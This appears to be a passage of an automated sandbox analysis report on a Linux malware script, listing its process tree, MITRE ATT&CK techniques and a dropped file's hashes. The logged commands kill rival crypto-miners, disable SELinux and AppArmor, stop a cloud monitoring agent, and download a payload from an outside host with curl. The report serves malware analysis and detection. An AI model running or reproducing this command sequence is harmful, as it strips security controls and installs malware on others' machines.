2⤵
PID:1833

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1832

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1831

/bin/grep
grep :7890
2⤵
PID:1830

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1840

/bin/grep
grep -v -
2⤵
PID:1839

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1838

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1837

/bin/grep
grep :3456
2⤵
PID:1836

/bin/systemctl
systemctl stop c3pool_miner.service
2⤵
PID:1841

/bin/systemctl
systemctl stop skypool_miner.service
2⤵
PID:1845

/bin/systemctl
systemctl disable c3pool_miner.service
2⤵
PID:1846

/bin/systemctl
systemctl disable skypool_miner.service
2⤵
PID:1850

/usr/bin/killall
killall log_rot
2⤵
PID:1854

/usr/bin/pkill
pkill -f log_rot
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1858

/usr/sbin/setenforce
setenforce 0
2⤵
- Disables SELinux
PID:1859

/usr/sbin/service
service apparmor stop
2⤵
PID:1860

/usr/bin/basename
basename /usr/sbin/service
3⤵
PID:1861

/usr/bin/basename
basename /usr/sbin/service
3⤵
PID:1862

/bin/systemctl
systemctl --quiet is-active multi-user.target
3⤵
PID:1863

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
3⤵
PID:1869

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
3⤵
PID:1868

/usr/local/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop apparmor.service
2⤵
- Disables AppArmor
PID:1860

/usr/local/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop apparmor.service
2⤵
- Disables AppArmor
PID:1860

/usr/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop apparmor.service
2⤵
- Disables AppArmor
PID:1860

/usr/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop apparmor.service
2⤵
- Disables AppArmor
PID:1860

/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop apparmor.service
2⤵
- Disables AppArmor
PID:1860

/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop apparmor.service
2⤵
- Disables AppArmor
PID:1860

/bin/systemctl
systemctl disable apparmor
2⤵
- Disables AppArmor
PID:1873

/lib/systemd/systemd-sysv-install
/lib/systemd/systemd-sysv-install disable apparmor
3⤵
PID:1877

/usr/bin/getopt
getopt -o r: --long root: -- disable apparmor
4⤵
PID:1878

/usr/sbin/update-rc.d
/usr/sbin/update-rc.d apparmor defaults
4⤵
PID:1879

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1880

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1880

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1880

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1880

/sbin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1880

/bin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1880

/usr/sbin/update-rc.d
/usr/sbin/update-rc.d apparmor disable
4⤵
- Flushes firewall rules
PID:1881

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1885

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1885

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1885

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1885

/sbin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1885

/bin/systemctl
systemctl daemon-reload
5⤵
- Disables AppArmor
PID:1885

/usr/sbin/service
service aliyun.service stop
2⤵
PID:1889

/usr/bin/basename
basename /usr/sbin/service
3⤵
PID:1893

/usr/bin/basename
basename /usr/sbin/service
3⤵
PID:1894

/bin/systemctl
systemctl --quiet is-active multi-user.target
3⤵
- Disables AppArmor
PID:1895

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
3⤵
PID:1898

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
3⤵
- Disables AppArmor
PID:1897

/usr/local/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
2⤵
- Disables AppArmor
PID:1889

/usr/local/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
2⤵
- Disables AppArmor
PID:1889

/usr/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
2⤵
- Disables AppArmor
PID:1889

/usr/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
2⤵
- Disables AppArmor
PID:1889

/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
2⤵
- Disables AppArmor
PID:1889

/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
2⤵
- Disables AppArmor
PID:1889

/bin/systemctl
systemctl disable aliyun.service
2⤵
- Disables AppArmor
PID:1905

/usr/bin/curl
curl https://w1ndows.fun:8443/docker.tar.gz -o /var/tmp/.docker.tar.gz
2⤵
PID:1909

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

1

T1548

Sudo and Sudo Caching

1

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

1

T1548

Sudo and Sudo Caching

1

T1548.003

Indicator Removal

1

T1070

Clear Linux or Mac System Logs

1

T1070.002

Credential Access

Discovery

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads